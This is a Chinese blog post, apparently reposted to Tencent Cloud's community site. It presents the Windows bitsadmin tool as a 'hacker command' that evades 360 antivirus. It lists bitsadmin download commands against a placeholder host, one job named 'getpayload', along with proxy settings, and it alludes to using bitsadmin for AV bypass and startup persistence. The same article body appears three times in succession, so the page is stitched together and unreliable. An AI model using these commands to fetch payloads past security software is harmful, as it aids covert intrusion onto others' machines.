有趣的命令行系列——360安全卫士都拦不住的黑客命令bitsadmin

原创 海阳顶端

海阳顶端头条号,专注于黑客知识普及,提高大众网络安全意识。有趣的命令行系列,这是第十四篇。自Win7开始系统默认包含Bitsadmin,是一个命令行工具,可用于创建下载或上载作业并监视其进度。它也可通过powershell调用,名称为BITS cmdlets。但是这个命令,黑客们发现了它的一些强大功能,本文介绍一下。

一、Bitsadmin 下载文件命令示例

我在WIN10下,Bitsadmin版本为3.0,这个命令太复杂了,如果介绍完估计能写一本书,光是它的参数就够让你头疼的。

不过我们化繁为简,只提取几个我们能需要的命令。黑客渗透测试当中,最常干的事就是上传下载了。Bitsadmin下载文件有多种方法,你只需掌握一种就行,下边我给你列出四种下载方法:

1.bitsadmin /rawreturn /transfer getfile http://url/files/PSTools.zip c:p.zip

2.bitsadmin /rawreturn /transfer getpayload http://url/files/PSTools.zip c:p.zip

3.bitsadmin /transfer myDownLoadJob /download /priority normal "http://url/PSTools.zip" "c:p.zip"

第3条命令带进度条。

多条命令合起来下载

4.bitsadmin /create myDownloadJob

bitsadmin /addfile myDownloadJob http://url c:lcx.zip

bitsadmin /resume myDownloadJob

bitsadmin /info myDownloadJob /verbose

bitsadmin /complete myDownloadJob

我以第一种方法示例抓图:

二、Bitsadmin查看和取消下载任务

在第一步的第4条中,我们建立了myDownloadJob任务。如何查看本机的任务和取消任务呢?

列出所有任务:

bitsadmin /list /allusers /verbose#如果列所有用户需管理员权限

删除某个任务:

bitsadmin /cancel

上图中我只是个测试图,我并没有建立myDownloadJob任务。

三、设置全局HTTP(S)代理

微软给出的具体示例是:

bitsadmin /util /setieproxy localsystem AUTODETECT

bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1,proxy2,proxy3 NULL

bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1:80 ""

下图是在我的WIN10本机下执行的命令:

bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 "local"。

还有其它设置的命令如下,可以自己试一下。

bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 “”

bitsadmin /util /setIEproxy localservice MANUAL_PROXY 10.1.1.20:8080 “”

bitsadmin /util /setIEproxy networkservice MANUAL_PROXY 10.1.1.20:8080 “”

显示本机代理和取消本机代理的命令。

1.Bitsadmin /util /getIEproxy localservice

2.bitsadmin /util /setIEproxy localservice NO_PROXY

有趣的命令行系列——360安全卫士都拦不住的黑客命令bitsadmin

原创 海阳顶端 2017-12-14 07:31:05

海阳顶端头条号,专注于黑客知识普及,提高大众网络安全意识。有趣的命令行系列,这是第十四篇。自Win7开始系统默认包含Bitsadmin,是一个命令行工具,可用于创建下载或上载作业并监视其进度。它也可通过powershell调用,名称为BITS cmdlets。但是这个命令,黑客们发现了它的一些强大功能,本文介绍一下。

一、Bitsadmin 下载文件命令示例

我在WIN10下,Bitsadmin版本为3.0,这个命令太复杂了,如果介绍完估计能写一本书,光是它的参数就够让你头疼的。

不过我们化繁为简,只提取几个我们能需要的命令。黑客渗透测试当中,最常干的事就是上传下载了。Bitsadmin下载文件有多种方法,你只需掌握一种就行,下边我给你列出四种下载方法:

1.bitsadmin /rawreturn /transfer getfile http://url/files/PSTools.zip c:p.zip

2.bitsadmin /rawreturn /transfer getpayload http://url/files/PSTools.zip c:p.zip

3.bitsadmin /transfer myDownLoadJob /download /priority normal "http://url/PSTools.zip" "c:p.zip"

第3条命令带进度条。

多条命令合起来下载

4.bitsadmin /create myDownloadJob

bitsadmin /addfile myDownloadJob http://url c:lcx.zip

bitsadmin /resume myDownloadJob

bitsadmin /info myDownloadJob /verbose

bitsadmin /complete myDownloadJob

我以第一种方法示例抓图:

二、Bitsadmin查看和取消下载任务

在第一步的第4条中,我们建立了myDownloadJob任务。如何查看本机的任务和取消任务呢?

列出所有任务:

bitsadmin /list /allusers /verbose#如果列所有用户需管理员权限

删除某个任务:

bitsadmin /cancel

上图中我只是个测试图,我并没有建立myDownloadJob任务。

三、设置全局HTTP(S)代理

微软给出的具体示例是:

bitsadmin /util /setieproxy localsystem AUTODETECT

bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1,proxy2,proxy3 NULL

bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1:80 ""

下图是在我的WIN10本机下执行的命令:

bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 "local"。

还有其它设置的命令如下,可以自己试一下。

bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 “”

bitsadmin /util /setIEproxy localservice MANUAL_PROXY 10.1.1.20:8080 “”

bitsadmin /util /setIEproxy networkservice MANUAL_PROXY 10.1.1.20:8080 “”

显示本机代理和取消本机代理的命令。

1.Bitsadmin /util /getIEproxy localservice

2.bitsadmin /util /setIEproxy localservice NO_PROXY

有趣的命令行系列——360安全卫士都拦不住的黑客命令bitsadmin

原创 海阳顶端 2017-12-14 07:31:05

海阳顶端头条号,专注于黑客知识普及,提高大众网络安全意识。有趣的命令行系列,这是第十四篇。自Win7开始系统默认包含Bitsadmin,是一个命令行工具,可用于创建下载或上载作业并监视其进度。它也可通过powershell调用,名称为BITS cmdlets。但是这个命令,黑客们发现了它的一些强大功能,本文介绍一下。

一、Bitsadmin 下载文件命令示例

我在WIN10下,Bitsadmin版本为3.0,这个命令太复杂了,如果介绍完估计能写一本书,光是它的参数就够让你头疼的。

不过我们化繁为简,只提取几个我们能需要的命令。黑客渗透测试当中,最常干的事就是上传下载了。Bitsadmin下载文件有多种方法,你只需掌握一种就行,下边我给你列出四种下载方法:

1.bitsadmin /rawreturn /transfer getfile http://url/files/PSTools.zip c:p.zip

2.bitsadmin /rawreturn /transfer getpayload http://url/files/PSTools.zip c:p.zip

3.bitsadmin /transfer myDownLoadJob /download /priority normal "http://url/PSTools.zip" "c:p.zip"

第3条命令带进度条。

多条命令合起来下载

4.bitsadmin /create myDownloadJob

bitsadmin /addfile myDownloadJob http://url c:lcx.zip

bitsadmin /resume myDownloadJob

bitsadmin /info myDownloadJob /verbose

bitsadmin /complete myDownloadJob

我以第一种方法示例抓图:

二、Bitsadmin查看和取消下载任务

在第一步的第4条中,我们建立了myDownloadJob任务。如何查看本机的任务和取消任务呢?

列出所有任务:

bitsadmin /list /allusers /verbose#如果列所有用户需管理员权限

删除某个任务:

bitsadmin /cancel

上图中我只是个测试图,我并没有建立myDownloadJob任务。

三、设置全局HTTP(S)代理

微软给出的具体示例是:

bitsadmin /util /setieproxy localsystem AUTODETECT

bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1,proxy2,proxy3 NULL

bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1:80 ""

下图是在我的WIN10本机下执行的命令:

bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 "local"。

还有其它设置的命令如下,可以自己试一下。

bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 “”

bitsadmin /util /setIEproxy localservice MANUAL_PROXY 10.1.1.20:8080 “”

bitsadmin /util /setIEproxy networkservice MANUAL_PROXY 10.1.1.20:8080 “”

显示本机代理和取消本机代理的命令。

1.Bitsadmin /util /getIEproxy localservice

2.bitsadmin /util /setIEproxy localservice NO_PROXY

三、Bitsadmin过360主防加启动项

这个功能我以前用了好久,不过后来被黑客3gstudent公布了,所以本文我也就不写了。具体细节你可以百度搜索《Use bitsadmin to maintain persistence and bypass Autoruns》这篇文章。这个方法一公布出来就被封了,再是用这种方法有个90天的限制的。

图文来自网络 侵删

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20171214A0VFQR00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券